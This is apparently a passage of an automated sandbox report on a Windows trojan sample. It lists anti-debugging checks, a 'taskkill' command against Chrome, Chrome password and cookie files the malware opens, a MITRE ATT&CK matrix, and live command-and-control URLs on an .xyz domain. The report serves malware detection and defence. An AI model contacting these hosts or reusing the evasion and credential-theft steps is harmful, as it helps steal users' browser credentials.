Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Source: 56BB1610C0318054.exe, 00000002.00000003.387577851.0000000003D76000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 56BB1610C0318054.exe, 00000004.00000002.378670009.0000000002A09000.00000004.00000001.sdmpBinary or memory string: 25-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}#V
Source: 56BB1610C0318054.exe, 00000002.00000003.387787563.0000000003D61000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: C:\Users\user\AppData\Roaming\1611970637183.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,
Hides threads from debuggersShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeThread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess queried: DebugObjectHandle
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess queried: DebugFlags
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00403E2C rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001A010 IsDebuggerPresent,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00404E19 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000E90E GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099461F SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00991C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001779F cpuid
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10015254 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00401000 GetVersionExA,GetVersionExA,GetVersionExA,GetVersionExA,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Replication Through Removable Media1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1Input Capture1Peripheral Device Discovery11Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Browser Extensions1Process Injection11Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Bootkit1Logon Script (Mac)Install Root Certificate2NTDSSystem Information Discovery157Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsQuery Registry2SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery561VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncVirtualization/Sandbox Evasion13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion13Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection11/etc/passwd and /etc/shadowRemote System Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Bootkit1Network SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 346134 Sample: Cyfj6XGbkd Startdate: 29/01/2021 Architecture: WINDOWS Score: 93 96 Malicious sample detected (through community Yara rule) 2->96 98 Multi AV Scanner detection for submitted file 2->98 100 Uses ping.exe to sleep 2->100 102 3 other signatures 2->102 8 Cyfj6XGbkd.exe 1 3 2->8         started        13 msiexec.exe 2->13         started        process3 dnsIp4 72 84cfba021a5a6662.xyz 104.21.23.16, 49725, 49729, 49730 CLOUDFLARENETUS United States 8->72 68 C:\Users\user\...\56BB1610C0318054.exe, PE32 8->68 dropped 70 C:\...\56BB1610C0318054.exe:Zone.Identifier, ASCII 8->70 dropped 104 Installs new ROOT certificates 8->104 106 Contains functionality to infect the boot sector 8->106 108 Registers a new ROOT certificate 8->108 110 4 other signatures 8->110 15 56BB1610C0318054.exe 26 8->15         started        20 56BB1610C0318054.exe 1 15 8->20         started        22 cmd.exe 1 8->22         started        24 msiexec.exe 4 8->24         started        file5 signatures6 process7 dnsIp8 76 84cfba021a5a6662.xyz 15->76 78 84CFBA021A5A6662.xyz 15->78 54 C:\Users\user\AppData\...\1611970637183.exe, PE32 15->54 dropped 56 C:\Users\user\AppData\Local\Temp\xldl.dll, PE32 15->56 dropped 58 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 15->58 dropped 66 7 other files (none is malicious) 15->66 dropped 84 Multi AV Scanner detection for dropped file 15->84 86 Detected unpacking (creates a PE file in dynamic memory) 15->86 88 Machine Learning detection for dropped file 15->88 94 3 other signatures 15->94 26 cmd.exe 15->26         started        29 1611970637183.exe 2 15->29         started        32 ThunderFW.exe 1 15->32         started        80 84cfba021a5a6662.xyz 20->80 60 C:\Users\user\AppData\...\Secure Preferences, UTF-8 20->60 dropped 62 C:\Users\user\AppData\Local\...\Preferences, ASCII 20->62 dropped 90 Tries to harvest and steal browser information (history, passwords, etc) 20->90 34 cmd.exe 1 20->34         started        36 cmd.exe 1 20->36         started        82 127.0.0.1 unknown unknown 22->82 92 Uses ping.exe to sleep 22->92 38 conhost.exe 22->38         started        40 PING.EXE 1 22->40         started        64 C:\Users\user\AppData\Local\...\MSIDCDD.tmp, PE32 24->64 dropped file9 signatures10 process11 dnsIp12 42 conhost.exe 26->42         started        44 PING.EXE 26->44         started        74 192.168.2.1 unknown unknown 29->74 112 Uses ping.exe to sleep 34->112 46 conhost.exe 34->46         started        48 PING.EXE 1 34->48         started        50 taskkill.exe 1 36->50         started        52 conhost.exe 36->52         started        signatures13 process14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Cyfj6XGbkd.exe40%VirustotalBrowse
Cyfj6XGbkd.exe24%MetadefenderBrowse
Cyfj6XGbkd.exe59%ReversingLabsWin32.Trojan.Phonzy
Cyfj6XGbkd.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe24%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe59%ReversingLabsWin32.Trojan.Phonzy
C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe8%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe2%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\atl71.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\download_user.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\download_user.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\zlib1.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\zlib1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\xldl.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\xldl.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
84CFBA021A5A6662.xyz1%VirustotalBrowse
84cfba021a5a6662.xyz1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://84cfba021a5a6662.xyz/info_old/g1%VirustotalBrowse
http://84cfba021a5a6662.xyz/info_old/g0%Avira URL Cloudsafe
http://84cfba021a5a6662.xyz/info_old/e0%Avira URL Cloudsafe
http://84cfba021a5a6662.xyz/info_old/w0%Avira URL Cloudsafe
https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
https://A5D4CE54CC78B3CA.xyz/0%Avira URL Cloudsafe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js0%Avira URL Cloudsafe
http://84cfba021a5a6662.xyz/info_old/r0%Avira URL Cloudsafe
https://twitter.comsec-fetch-dest:0%Avira URL Cloudsafe
http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z0%Avira URL Cloudsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://84CFBA021A5A6662.xyz/al0%Avira URL Cloudsafe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
http://ocsp.pki.goog/GTSGIAG300%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/llr0%Avira URL Cloudsafe
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/llH0%Avira URL Cloudsafe
http://www.youtube.comT0%Avira URL Cloudsafe
http://www.vb-cable.comVBCABLE0%Avira URL Cloudsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://www.youtube.comf0%Avira URL Cloudsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=10%Avira URL Cloudsafe
http://www.vb-cable.com0%Avira URL Cloudsafe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js0%Avira URL Cloudsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://pki.goog/gsr2/GTSGIAG3.crt0)0%Avira URL Cloudsafe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:0%Avira URL Cloudsafe
http://pki.goog/gsr2/GTS1O1.crt0#0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/info_old/ddd0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/info_old/wV0%Avira URL Cloudsafe
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.0%Avira URL Cloudsafe
http://84cfba021a5a6662.xyz/info_old/wI0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/f0%Avira URL Cloudsafe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL0%Avira URL Cloudsafe
https://www.instagram.comsec-fetch-mode:0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
84CFBA021A5A6662.xyz
104.21.23.16
truefalseunknown
84cfba021a5a6662.xyz
104.21.23.16
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://84cfba021a5a6662.xyz/info_old/gfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://84cfba021a5a6662.xyz/info_old/efalse
  • Avira URL Cloud: safe
unknown
http://84cfba021a5a6662.xyz/info_old/wfalse
  • Avira URL Cloud: safe
unknown
http://84cfba021a5a6662.xyz/info_old/rfalse
  • Avira URL Cloud: safe
unknown
http://84CFBA021A5A6662.xyz/info_old/dddfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplateecvFEAD.tmp.9.drfalse
    		high
    https://duckduckgo.com/chrome_newtab56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drfalse
      		high
      https://duckduckgo.com/ac/?q=56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drfalse
        		high
        https://www.messenger.com/56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
          		high
          http://www.msn.comecvFEAD.tmp.9.drfalse
            		high
            http://www.nirsoft.net1611970637183.exe, 00000009.00000002.384711842.0000000000198000.00000004.00000010.sdmpfalse
              		high
              https://deff.nelreports.net/api/report?cat=msnecvFEAD.tmp.9.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://A5D4CE54CC78B3CA.xyz/56BB1610C0318054.exe, 00000002.00000003.409442821.0000000003810000.00000004.00000040.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contextual.media.net/__media__/js/util/nrrV9140.jsecvFEAD.tmp.9.drfalse
                		high
                https://twitter.com/ookie:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                  		high
                  https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.jsecvFEAD.tmp.9.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://twitter.comsec-fetch-dest:56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2ZecvFEAD.tmp.9.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0fecvFEAD.tmp.9.drfalse
                    		high
                    http://charlesproxy.com/sslCyfj6XGbkd.exe, 00000000.00000002.365655774.000000000089B000.00000004.00000020.sdmpfalse
                      		high
                      http://ocsp.pki.goog/gts1o1core0ecvFEAD.tmp.9.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.msn.com/?ocid=iehpecvFEAD.tmp.9.drfalse
                        		high
                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3ecvFEAD.tmp.9.drfalse
                          		high
                          http://crl.pki.goog/GTS1O1core.crl0ecvFEAD.tmp.9.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://www.messenger.com56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                            		high
                            https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9ecvFEAD.tmp.9.drfalse
                              		high
                              http://www.nirsoft.net/1611970637183.exe, 1611970637183.exe.2.drfalse
                                		high
